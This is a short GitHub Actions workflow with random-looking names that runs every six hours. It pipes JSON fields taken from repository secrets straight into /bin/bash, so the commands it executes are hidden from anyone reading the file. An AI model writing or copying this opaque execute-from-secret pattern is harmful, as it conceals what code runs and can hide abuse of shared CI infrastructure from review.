name: dongyugang0987

on:
  workflow_dispatch:
  schedule:
    - cron: '31 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongyugang0987
        env:
          izerf7: ${{ secrets.izerf7 }}
        run: |
          echo $izerf7 | jq -r .eze5 | /bin/bash
          echo $okypq01104 | jq -r .aac1 | /bin/bash
          echo $dy6 | jq -r .u0 | /bin/bash

